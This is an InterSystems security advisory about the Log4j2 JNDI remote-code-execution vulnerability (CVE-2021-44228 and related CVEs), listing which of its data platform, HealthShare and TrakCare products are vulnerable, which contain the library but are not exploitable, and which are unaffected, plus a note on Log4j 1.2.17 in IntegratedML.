JNDI Vulnerability in Apache Log4j2 Library Affecting InterSystems Products/Services

LAST UPDATED: 22 DECEMBER 2021 17:00 UTC/12:00 EST
This document is posted at: https://www.intersystems.com/gt/apache-log4j2/

Summary

InterSystems investigated the impact of a security vulnerability related to Apache Log4j2. In addition, please see the note at the end of this alert regarding Log4j 1.2.17. Log4j2 is a commonly used open-source, third-party Java logging library used in software applications and services.

The vulnerability — impacting at least Apache Log4j2 (versions 2.0 to 2.14.1) — was announced by Apache and is reported in the United States National Vulnerability Database (NVD) as CVE-2021-44228 with the highest severity rating on the Common Vulnerability Scoring System (CVSS), 10.0. The initial remediation from Apache, v2.15.0, was incomplete as noted in CVE-2021-45046. 

Apache Log4j2 features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. If exploited, this vulnerability allows adversaries to potentially take full control of the impacted system. 

InterSystems investigated the impact of these vulnerabilities on its products and services, including its Managed Services. Apache has provided general remediations for the vulnerabilities which some customers may find helpful. 

A list of products affected and not affected by these vulnerabilities is provided below. Any product not listed in the Products Under Investigation or Vulnerable Products section of this alert is to be considered not vulnerable. 

No further updates are expected on this alert.  


Vulnerable Products

The following lists InterSystems products that are affected by the vulnerabilities that is described in this alert. Customers should contact the WRC for further details on affected products. 

Registered InterSystems customers can get more information about how each vulnerable product is affected and steps to mitigate the vulnerabilities from the WRC remediation document (WRC login required). 

Data Platforms Add-ons 
 • Adaptive Analytics
 • InterSystems Reports Server
 • InterSystems Reports Designer 

TrakCare
 • TrakCare Core 

Products Containing Vulnerable log4j2 but are Not Exploitable
The following products contain a vulnerable version of log4j2 but the library is not used to process data from untrusted sources. 

Data Platforms Add-ons
 • InterSystems Cloud Manager

HealthShare 
 • HealthShare Clinical Viewer (2019.2 to 2021.2) 


Products Confirmed Not Vulnerable

InterSystems has confirmed that the following products do not contain log4j and are not affected by these vulnerabilities:

Data Platforms
• InterSystems IRIS
• Caché
• InterSystems IRIS for Health
• Ensemble


Data Platforms Add-ons

• Atelier Integration
• CSP Gateway for CE
• IRIS Studio
• InterSystems API Manager
• InterSystems Kubernetes Operator (IKO)
• ISC Agent
• Legacy .Net bindings
• Legacy node JS binding
• ODBC Driver
• System Alerting and Monitoring (SAM)
• VS Code Integration
• Web Gateway for IRIS
• Zen Mojo

HealthShare
• HealthShare Clinical Viewer (2019.1 and earlier)
• Unified Care Record
• Care Community
• Personal Community
• Provider Directory
• Health Insight
• Patient Index
• Health Connect


TrakCare

• TrakCare Editions
• TrakCare Lab

Cloud Delivery Offerings
• FHIR Accelerator (FHIRaaS)
• HealthShare Message Transformation Service
• Health Integration as a Service


Log4j 1.2 Issues

As part of the investigation into Log4j2 impacts to InterSystems products and the release of CVE-2021-4104 with the rescoring of CVE-2019-17571 on 16 December 2021, InterSystems is providing notice that the following product contains Log4j 1.2.17. InterSystems is continuing to evaluate the fix and will update this alert as additional information becomes available.

Data Platforms Add-ons
• IntegratedML
(As shipped with InterSystems IRIS, vulnerable only when configured to use the H2O provider)